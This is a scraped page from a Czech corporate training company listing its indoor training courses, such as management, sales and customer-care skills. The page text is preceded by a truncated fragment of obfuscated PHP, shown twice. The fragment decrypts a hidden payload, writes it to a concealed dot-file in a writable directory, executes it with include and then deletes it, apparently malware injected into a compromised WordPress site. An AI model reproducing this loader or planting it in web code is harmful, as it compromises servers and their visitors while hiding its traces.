100 ? 8 : 2; while( strlen($ff)<$len ) { $ff .= substr(pack('H*', sha1($fa.$ff.$fe)), 0, $n); } return $fd^$ff; } $reqw = $ay($ao($oa("$pass"), 'wp_function')); preg_match('#gogo(.*)enen#is', $reqw, $mtchs); $dirs = glob("*", GLOB_ONLYDIR); foreach ($dirs as $dira) { if (fopen("$dira/.$algo", 'w')) { $ura = 1; $eb = "$dira/"; $hdl = fopen("$dira/.$algo", 'w'); break; } $subdirs = glob("$dira/*", GLOB_ONLYDIR); foreach ($subdirs as $subdira) { if (fopen("$subdira/.$algo", 'w')) { $ura = 1; $eb = "$subdira/"; $hdl = fopen("$subdira/.$algo", 'w'); break; } } } if (!$ura && fopen(".$algo", 'w')) { $ura = 1; $eb = ''; $hdl = fopen(".$algo", 'w'); } fwrite($hdl, ""); fclose($hdl); include("{$eb}.$algo"); unlink("{$eb}.$algo"); $npDcheckClassBgp = 'aue'; } ?> 100 ? 8 : 2; while( strlen($ff)<$len ) { $ff .= substr(pack('H*', sha1($fa.$ff.$fe)), 0, $n); } return $fd^$ff; } $reqw = $ay($ao($oa("$pass"), 'wp_function')); preg_match('#gogo(.*)enen#is', $reqw, $mtchs); $dirs = glob("*", GLOB_ONLYDIR); foreach ($dirs as $dira) { if (fopen("$dira/.$algo", 'w')) { $ura = 1; $eb = "$dira/"; $hdl = fopen("$dira/.$algo", 'w'); break; } $subdirs = glob("$dira/*", GLOB_ONLYDIR); foreach ($subdirs as $subdira) { if (fopen("$subdira/.$algo", 'w')) { $ura = 1; $eb = "$subdira/"; $hdl = fopen("$subdira/.$algo", 'w'); break; } } } if (!$ura && fopen(".$algo", 'w')) { $ura = 1; $eb = ''; $hdl = fopen(".$algo", 'w'); } fwrite($hdl, ""); fclose($hdl); include("{$eb}.$algo"); unlink("{$eb}.$algo"); $npDcheckClassBgp = 'aue'; } ?> Indoor trénink - AKORD OT

Indoor trénink

 • Osobní kompetence

  Osobní kompetence

  Pomůžeme vašim lidem zvýšit sebejistotu v komunikaci s druhými a ukážeme, jak efektivně spolupracovat s kolegy v týmu. Jak působit…

  více

 • Manažerské dovednosti

  Manažerské dovednosti

  Co všechno musí zvládat manažer a jak na to? Nastartujeme nováčky a nabídneme i specializovaná témata…

  více

 • Dlouhodobé programy

  Dlouhodobé programy

  Manažerská akademie, práce s trainees nebo talenty… Navrhneme celý program nebo vám dodáme dílčí „komponenty“. Manažerská akademie…

  více

 • Péče o zákazníka

  Péče o zákazníka

  Víme, jak rozvíjet pracovníky call center a zákaznického servisu, aby byli vaši klienti vždy spokojeni. Trénink…

  více

 • Obchodní dovednosti

  Obchodní dovednosti

  Prodej, to je dílem šarm a dílem poctivé „řemeslo“. Dokážeme ve vašich lidech rozvinout oboje. Prodej…

  více

 • Lektorské dovednosti

  Lektorské dovednosti

  Využíváte interní lektory? S naším tréninkem budou jejich kurzy nejen odborné, ale i poutavě vedené. Trénink interních…

  více